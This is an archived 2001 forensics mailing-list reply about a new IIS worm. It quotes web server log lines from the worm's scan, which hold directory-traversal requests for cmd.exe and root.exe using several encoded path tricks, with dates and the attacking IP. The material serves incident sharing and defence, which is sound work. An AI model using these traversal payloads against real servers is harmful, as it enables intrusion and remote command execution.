RE: New Worm ?

From: Becher, Jim (Jim.Becherat_private)
Date: Tue Sep 18 2001 - 08:33:20 PDT

Next message: Flynn Tom: "New problem"

Previous message: Oliver Ehli: "Re: New Worm ?"
Maybe in reply to: Cory McIntire: "New Worm ?"
Next in thread: Mark Challender: "RE: New Worm ?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I picked up our first occurrences of this on 9/18/2001 at 8:29:27 central.
The attempts were from the same Class A address space, until 9/18/2001 at
10:12:52 central.



-----Original Message-----
From: Cory McIntire [mailto:coryat_private]
Sent: Tuesday, September 18, 2001 9:43 AM
To: forensicsat_private
Subject: New Worm ?


Hello, 
I and a few others I know are getting bombard on our machines with IIS 
requests....looks like another worm, and its much smarter than before, it 
seems to stay within the same class A and sometimes the same class B as the 
attacking machine is in. here is an excerpt of what i believe is the full 
scan....

204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:14 -0500] "GET
/scripts/root.exe?/c+dir 
HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:22 -0500] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

just thought I would let you guys know...this one looks bad fella.....thank 
god for apache.....that is of course, if there isnt a huge bog down on the 
net....=[

cory

-----------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

-----------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Flynn Tom: "New problem"
Previous message: Oliver Ehli: "Re: New Worm ?"
Maybe in reply to: Cory McIntire: "New Worm ?"
Next in thread: Mark Challender: "RE: New Worm ?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 10:04:57 PDT